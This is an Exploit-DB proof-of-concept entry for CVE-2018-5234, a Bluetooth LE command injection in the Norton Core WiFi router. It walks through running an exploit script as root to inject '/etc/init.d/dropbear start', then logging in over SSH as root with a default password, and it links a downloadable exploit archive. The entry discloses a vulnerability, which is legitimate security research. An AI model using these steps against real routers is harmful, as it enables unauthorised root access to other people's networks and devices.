Norton Core Secure WiFi Router - 'BLE' Command Injection (PoC)

EDB-ID: 44574
Author: embedi
Published: 2018-05-02
CVE: CVE-2018-5234
Type: Remote
Platform: Hardware
Aliases: N/A
Advisory/Source: Link
Tags: N/A
Vulnerable App: N/A

  
For more information read
[paper](https://embedi.com/blog/whos-watching-the-watchers-vol-ii-norton-core-secure-wifi-router).

To demonstrate the exploitation, we will use:
- OS GNU/Linux;
- Bluetooth dongle adapter;
- BlueZ utility (for testing Bluetooth connection).

In order to use the script, we will need to set all dependencies in a advance:

```shell
$ pip install -r ./requirements.txt
```

With the help of `BlueZ` utilities, we should ensure Bluetooth is enabled and
functions properly.

1. Restart the router to provide access to the engineering page.
2. Start the PoC on behalf of the root user (required for operating with
Bluetooth) with the command on executing as an argument:

```shell
$ ./ble_norton_core.py "/etc/init.d/dropbear start"
```

After the script is successfully executed, we get access to the device via
the SSH connection. We put `root` as a user and `admin` as password:

```shell
$ ssh [email protected]
```

Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44574.zip

Related Posts